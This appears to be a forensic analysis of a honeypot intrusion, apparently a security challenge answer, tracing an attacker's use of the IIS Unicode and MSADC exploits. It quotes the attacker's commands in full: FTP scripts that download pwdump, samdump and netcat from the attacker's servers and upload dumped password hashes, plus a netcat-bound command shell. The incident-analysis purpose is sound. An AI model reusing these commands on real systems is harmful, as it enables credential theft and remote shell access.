Summary and answers to questions ================================ 1. Two main exploits were used. One was the IIS Unicode problem, which allows a remote user to read any file that the web server can access. The other was a known problem in MSADC, which allows arbitrary code to be executed. 2. This was exploited to allow the cracker to FTP netcat, and then bind a command shell to a port so he could telnet in. 3. Once access was gained, the cracker mainly nosed around the filesystem, and attempted to elevate access either through recovering a copy of the SAM database, or through adding himself to the administrator group. 4. This attack could have been prevented by making sure the IIS server was properly patched. would have helped. The bugs in question are around two years old. 5. I spent about four hours on this. I used ethereal mostly because of the TCP session reassembly. tcpdump, and some perl magic were used to help me spot the commands sent via the msdac bug, but a small bug and the cracker's constant bumbling made me second guess the output. On a side note, I would classify this person as a script kiddie. The attack and penetration was fairly stock, and the constant typos and syntax mistakes are not something an experienced person would do. Bonus: No, he didn't know. He thought it was a lab machine that was sitting exposed, likely because of the lack of installed software and default configurations. Detailed Explanation of Work ============================ Set etherreal filters to (ip.addr == to start off Added a colourization filter to mark all SYN flags red to make things easier on my poor eyes. Following his requets, we come across packets 117-120. arachNIDS identifies these as iis-unicode attacks. It would appear he is trying to get the boot.ini file. They all work, returning that this is an NT server, and likely does not dual boot. On a side note, four requests are made for the same file using four different encodings of the request, suggesting that this portion of the attack has been automated. Then a directory view of /msadc is tried. That's forbidden, so the hacker tries for msadcs.dll directly. Yep, it's there, so he tries to exploit it. The "!ADM!ROX!YOUR!WORLD!" string within the stream points to a published exploit: Since all commands sent via this method are quite static in terms of formatting, it was pretty easy to write a perl script to spit out the commands, and to pick them out from the etherreal requests. A series of commands are executed echo werd > c:\fun echo user johna2k > ftpcom echo hacker2000 >> ftpcom echo get samdump.dll >> ftpcom echo get pdump.exe >> ftpcom echo get nc.exe >> ftpcom echo quit >> ftpcom ftp -s:ftpcom -n pdump.exe >>new.pass echo user johna2k > ftpcom2 echo hacker2000 >> ftpcom2 put new.pass >> ftpcom2 echo quit >>ftpcom2 ftp -s:ftpcom2 -n In a nutshell, it looks like he's snarfing the username and password hash list for offline processing. However, it would appear that something is wrong with account johna2k (stream starting at packet 438): 220 FTP server (SunOS 5.7) ready. USER johna2k 331 Password required for johna2k. PASS hacker2000 530 Login incorrect. QUIT 221 Goodbye. It is likely that johna2k was a hacked account which has been closed. At packet 459, he's back to getting some web pages, until 506 when he's going to execute another command ftp which opens an FTP connection to his own server: 220-Serv-U FTP-Server v2.5h for WinSock ready... 220--------H-A-C-K T-H-E P-L-A-N-E-T-------- 220-W3|_c0m3 T0 JohnA's 0d4y Ef-Tee-Pee S3rv3r. 220-Featuring 100% elite hax0r warez!@$#@ 220-Im running win 95 (Release candidate 1), on a p33, with 16mb Ram. 220 -------H-A-C-K T-H-E P-L-A-N-E-T-------- If you want a job done right, do it yourself, eh? Redo this to his own FTP server. more commands echo open > ftpcom echo johna2k >ftpcom # oops! echo hacker2000 >> ftpcom echo get samdump.dll >> ftpcom echo get pwdump.exe >> ftpcom echo get nc.exe >> ftpcom echo quit >> ftpcom ftp -s:ftpcom And nothing happens! (because he killed the "open" line) So he tries again, different server open echo johna2k >>sasfile echo haxedj00 >>sasfile echo get samdump.dll >> ftpcom echo get pdump.exe >>sasfile echo get nc.exe >>sasfile echo quit >>sasfile ftp -s:sasfile Once again, nothing, because he forgot to redirect the "open" command (he was doing better when he passed it on the command line!!) Not a swift fellow, open echo johna2k >>sasfile echo haxedj00 >>sasfile echo get samdump.dll >> ftpcom echo get pdump.exe >>sasfile echo get nc.exe >>sasfile echo quit >>sasfile ftp -s:sasfile Seeing that he has failed yet again, he copies cmd.exe into the msadc directory, and starts to do the same thing. This time, commands are executed through a similiar exploit. This time, it's a bit more successful. In 1224, he executes nc.exe (presumable netcat) on port 6969 attached to his cmd1.exe. At 1275 he initiates a session to his netcat port, and pokes his head around a bit. In the root directory, he notices an exploits directory which catches his attention. After a bit of poking around, he probably notices the "syslogd" and "wiretrip" directories, and may have clued in: C:\>echo Hi, i know that this a is a lab server, but patch the holes! :-) >>README.NOW.Hax0r echo Hi, i know that this a is a lab server, but patch the holes! :-) >>README.NOW.Hax0r A bit of fooling around with the net command, and then another stab at snarfing the password file that he couldn't get earlier from the command line and through the msdac hole. He also tries creating an rdisk in the root directory, to get the backup SAM. He does a bit of housecleaning, fumbles a few more commands, then leaves this session. More fumbling, tries to do another nc on port 6969, but that doesn't work. Tries on 6968. On this session, he does some more poking (into the wiretrip directory too), and looks around inetpub. Then he looks for other drives, but finds none. End of dump.